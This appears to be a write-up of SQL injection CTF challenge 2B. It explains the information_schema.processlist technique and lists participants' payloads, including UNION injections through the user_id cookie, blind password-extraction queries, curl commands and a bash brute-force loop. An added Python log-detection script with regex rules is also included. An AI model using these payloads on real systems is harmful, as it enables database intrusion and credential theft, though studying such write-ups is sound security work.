Solutions for challenge 2B

Posted on August 16, 2012 by Roberto Salgado

After posting the solutions for challenge 2A from the series of SQL Injection challenges, it only made sense to continue with 2B, considering that 'B' is a slightly more difficult variation of 'A'. Challenge 2B is probably my favorite challenge because of its simplicity, and yet how confusing it was for many participants.

Explanation

DISCLAIMER: If you haven't tried this challenge, it is still available here in case you want to give it a shot before reading the SOLUTIONS below.

This challenge, similar to 2A, allows you to log in as guest and creates the cookie user_id, which is vulnerable to SQL Injection. Initially no filtering was used, since the idea behind the challenge was to figure out different ways of retrieving the table/column name. What is tricky about this challenge is that it uses a temporary table to store the credentials, and the temp table only exists during the PHP script's execution. The thing about temporary tables is that they do not appear in information_schema.tables/columns, so this was the perfect way of making participants figure out other methods for obtaining the table/column names.

The intended solution is to use information_schema.processlist, which is available starting from MySQL 5.1. Injecting union select info from information_schema.processlist will return the whole query being executed, which can be extremely useful when table_name/column_name are being blocked by a WAF/IDS.

Example

Injected user_id value:

-1 union select info from information_schema.processlist

Resulting query:

SELECT websec_rocks_temp_username, websec_rocks_temp_user_priv FROM websec_rocks_temp_uzuAr1Os WHERE websec_rocks_temp_user_id = -1 union select info from information_schema.processlist
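Seen from the defender's side, the processlist trick is also what makes these injections easy to spot in the MySQL general query log: the application's own query never contains a UNION, never references information_schema.processlist and never carries PROCEDURE ANALYSE(). The following Python is an added example and not code from the original post or the challenge; the log lines are constructed to mimic the general-log layout (timestamp, connection id, command, argument), the injected query text is the one shown above, and the SHOW PROCESSLIST line is an extra case not discussed in the post.

```python
import re

# Constructed sample in MySQL general-log layout (not taken from the original post).
SAMPLE_LOG = """\
120816 10:01:02\t  41 Query\tSELECT websec_rocks_temp_username, websec_rocks_temp_user_priv FROM websec_rocks_temp_uzuAr1Os WHERE websec_rocks_temp_user_id = 3
120816 10:01:05\t  41 Query\tSELECT websec_rocks_temp_username, websec_rocks_temp_user_priv FROM websec_rocks_temp_uzuAr1Os WHERE websec_rocks_temp_user_id = -1 union select info from information_schema.processlist
120816 10:01:09\t  42 Query\tSELECT websec_rocks_temp_username, websec_rocks_temp_user_priv FROM websec_rocks_temp_uzuAr1Os WHERE websec_rocks_temp_user_id = 0 limit 3,1 PROCEDURE ANALYSE()
120816 10:01:11\t  42 Query\tSHOW PROCESSLIST
"""

# One general-log entry: optional timestamp, connection id, command, tab, argument.
LINE_RE = re.compile(r"^(?P<ts>\d{6} [\d:]+)?\s*(?P<id>\d+) (?P<cmd>\w+)\t(?P<arg>.*)$")

# Detection rules applied to the query text; the app query should trip none of them.
RULES = [
    ("processlist_read",
     re.compile(r"information_schema\s*\.\s*processlist|\bSHOW\s+(FULL\s+)?PROCESSLIST\b", re.I)),
    ("procedure_analyse", re.compile(r"\bPROCEDURE\s+ANALYSE\s*\(", re.I)),
    # A UNION after the user_id predicate means the cookie value was spliced into SQL.
    ("union_in_app_query", re.compile(r"websec_rocks_temp_user_id\s*=.*\bUNION\b", re.I | re.S)),
]


def parse_general_log(text):
    """Return (connection_id, command, argument) tuples; lines that do not start a
    new entry are treated as continuations of the previous entry's argument."""
    entries = []
    for raw in text.splitlines():
        m = LINE_RE.match(raw)
        if m:
            entries.append([int(m.group("id")), m.group("cmd"), m.group("arg")])
        elif entries:
            entries[-1][2] += "\n" + raw
    return [tuple(e) for e in entries]


def flag_queries(text):
    """Return (connection_id, rule_name, query) for every Query entry matching a rule."""
    hits = []
    for conn_id, cmd, arg in parse_general_log(text):
        if cmd != "Query":
            continue
        for name, rx in RULES:
            if rx.search(arg):
                hits.append((conn_id, name, arg))
    return hits


if __name__ == "__main__":
    for conn_id, name, query in flag_queries(SAMPLE_LOG):
        print(f"conn {conn_id}: {name}: {query[:80]}")
```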

Challenge Modifications

After w00d's and Miroslav's solutions, I made two slight adjustments to the challenge so that it would be solved as intended. w00d's solution used PROCEDURE ANALYSE(), so I decided to block the word 'PROCEDURE', since this method is already documented on The SQL Injection KB; w00d later submitted a solution using the intended method. As for Miroslav, he was able to find the column name through a dictionary attack using the txt/common-columns.txt file from sqlmap. The second modification was to change the column names so they could no longer be guessed.

Solutions

NULL Life CTF TEAM:

user_id= 3 union select 1,2,concat_ws(0x3a,command,time,state,info),4 from information_schema.processlist limit 1-- -

Raz0r:

user_id=-1+union+select+1,2,INFO,4+FROM+information_schema.PROCESSLIST+LIMIT+1--+-

user_id=0+and+IF(ORD(MID(temp_password,0,1))+BETWEEN+0+AND+255,1,(select+1+union+select+2))--+-

w00d:

curl -i http://50.57.51.240/challenges/2B/challenge.php --cookie "user_id=0 limit 3,1 PROCEDURE ANALYSE()"

curl -i http://50.57.51.240/challenges/2B/challenge.php --cookie "user_id=-1 union select group_concat(info),2 from information_schema.processlist"

Miroslav Stampar:

1 OR LENGTH()>0 LIMIT 0,1

user_id=0 AND ORD(MID(temp_password,17,1))>1 LIMIT 0,1

g4mm4:

user_id=-1 union select info,'padding' from information_schema.processlist#

Dominus:

user_id=0+and+1=0+union+select+1,unhex(hex(concat_ws(0x3a,info,state)))+from information_schema.processlist limit 0,1

user_id=0 and websec_rocks_temp_password like 'a%'

mortis:

Used processlist

user_id=0 and websec_rocks_temp_password like '%'

Karion:

Used processlist

for i in {4,5,6,7} ; do for j in {0,1,2,3,4,5,6,7,8,9,a,b,c,d,e,f} ; do curl http://50.57.51.240/challenges/2B/challenge.php -b "user_id=-9 or websec_rocks_temp_password LIKE 0x454c5f4d55595f56455247${i}${j}25" 2>&1 | grep ADMIN ; echo $i$j ;done; done

BlackFan:

user_id=-1 union select info,2 from information_schema.processlist limit 1;

user_id=0 and (@:=websec_rocks_temp_password) union select @,1;

gijs:

user_id=5 UNION select 1,(select info from information_schema.processlist LIMIT 1)

Same script from challenge 2A.

MisterJyu:

Used processlist

if(mid(binary(websec_rocks_temp_password),1,1)='a',0,1)

Submitted a Python script found here.

Nurfed:

user_id=-1 union select 1,info from information_schema.PROCESSLIST limit 0,1#

user_id=0 and LENGTH(websec_rocks_temp_password)=16#

user_id=0 and websec_rocks_temp_password like 0x25656c5f6d75795f76657267756974617325#

A full list of the victors for each challenge is available here.